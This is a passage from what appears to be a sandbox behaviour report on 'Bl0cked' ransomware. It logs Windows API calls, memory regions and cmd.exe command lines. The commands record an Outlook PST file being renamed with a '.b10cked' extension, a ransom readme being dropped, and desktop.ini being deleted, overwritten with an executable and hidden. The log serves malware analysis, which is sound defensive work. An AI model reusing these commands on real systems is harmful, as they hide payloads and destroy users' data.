returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0237.419] 
_wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0237.419] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0237.419] _wcsicmp (_String1="FEASF@~1.PST", _String2=".") returned 56 [0237.419] _wcsicmp (_String1="FEASF@~1.PST", _String2="..") returned 56 [0237.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@~1.pst")) returned 0x2020 [0237.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x111e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", nBufferLength=0x104, lpBuffer=0x30ed34, lpFilePart=0x30ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", lpFilePart=0x30ed1c*="FEASF@~1.PST") returned 0x2f [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1")) returned 0x10 [0237.420] _wcsicmp (_String1="FEASF@~1.PST", _String2=".") returned 56 [0237.420] _wcsicmp (_String1="FEASF@~1.PST", _String2="..") returned 56 [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@~1.pst")) returned 0x2020 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", nBufferLength=0x104, lpBuffer=0x30f1b0, lpFilePart=0x30ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", lpFilePart=0x30ef48*="FEASF@~1.PST") returned 0x2f [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", nBufferLength=0x104, lpBuffer=0x30f3b8, lpFilePart=0x30ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", lpFilePart=0x30ef48*="feasf@efw.com.pst.b10cked") returned 0x3c [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] SetLastError (dwErrCode=0x0) [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst.b10cked")) returned 0xffffffff [0237.421] GetLastError () returned 0x2 [0237.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", fInfoLevelId=0x1, lpFindFileData=0x30e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e8c4) returned 0x100ed0 [0237.421] FindNextFileW (in: hFindFile=0x100ed0, lpFindFileData=0x30e8c4 | out: lpFindFileData=0x30e8c4) returned 0 [0237.421] GetLastError () returned 0x12 [0237.421] FindClose (in: hFindFile=0x100ed0 | out: hFindFile=0x100ed0) returned 1 [0237.422] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", fInfoLevelId=0x1, lpFindFileData=0x111c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x111c20) returned 0x100ed0 [0237.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", nBufferLength=0x104, lpBuffer=0x30eb5c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", lpFilePart=0x0) returned 0x3c [0237.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst", nBufferLength=0x104, lpBuffer=0x30eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x34 [0237.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst")) returned 0x2020 [0237.422] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst.b10cked"), dwFlags=0x3) returned 1 [0237.423] FindClose (in: hFindFile=0x100ed0 | out: hFindFile=0x100ed0) returned 1 [0237.423] _vsnwprintf (in: _Buffer=0x4a855040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30eb10 | out: _Buffer=" 1") returned 9 [0237.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.423] GetFileType (hFile=0x7) returned 0x2 [0237.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0237.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ea9c | out: lpMode=0x30ea9c) returned 1 [0237.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ead0 | out: lpConsoleScreenBufferInfo=0x30ead0) returned 1 [0237.462] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0237.462] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x30eb10 | out: lpBuffer=" 1 
file(s) moved.\r\n") returned 0x1a [0237.462] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a864640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eaf4, lpReserved=0x0 | out: lpBuffer=0x4a864640*, lpNumberOfCharsWritten=0x30eaf4*=0x1a) returned 1 [0237.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.462] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.463] SetConsoleInputExeNameW () returned 0x1 [0237.463] GetConsoleOutputCP () returned 0x1b5 [0237.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.463] exit (_Code=0) Process: id = "653" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35860 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 35861 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35862 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35863 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35864 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35865 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35866 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35867 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35868 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35869 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35904 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35905 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35906 start_va = 0x50000 end_va 
= 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35907 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35908 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 35909 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35910 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35911 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35912 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35913 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35914 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35915 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35916 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35917 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35918 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 35919 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35920 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 894 os_tid = 0xf7c Process: id = "654" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" 
[0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35870 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35871 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35872 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 35873 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 35874 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35875 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35876 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35877 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35878 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 35879 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 35921 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35922 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35923 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35924 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 35925 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 35926 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 35927 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35928 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35929 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35930 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35931 start_va = 0x76a90000 end_va = 0x76b3bfff 
entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35932 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35933 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35934 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35935 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35936 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35937 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 35938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 895 os_tid = 0x458 Thread: id = 896 os_tid = 0xa0c Process: id = "655" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16220" os_pid = "0x43c" os_integrity_level = "0x4000" 
os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "339" os_parent_pid = "0x3e8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c83d" [0xc000000f], "LOCAL" [0x7] Region: id = 35940 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35941 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35942 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35943 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35944 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35945 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35946 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 35947 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 
region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35948 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 35949 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 35950 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 35951 start_va = 0x120000 end_va = 0x19ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 35952 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 35953 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35954 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 35955 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 35956 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 35957 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35958 start_va = 0x410000 end_va = 0x41dfff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 35959 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 35960 start_va = 0x430000 
end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35961 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35962 start_va = 0x550000 end_va = 0x942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35963 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 35964 start_va = 0x960000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 35965 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 35966 start_va = 0x980000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 35967 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 35968 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 35969 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 35970 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 35971 start_va = 0xaa0000 end_va = 0xaaffff entry_point = 0xaa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: 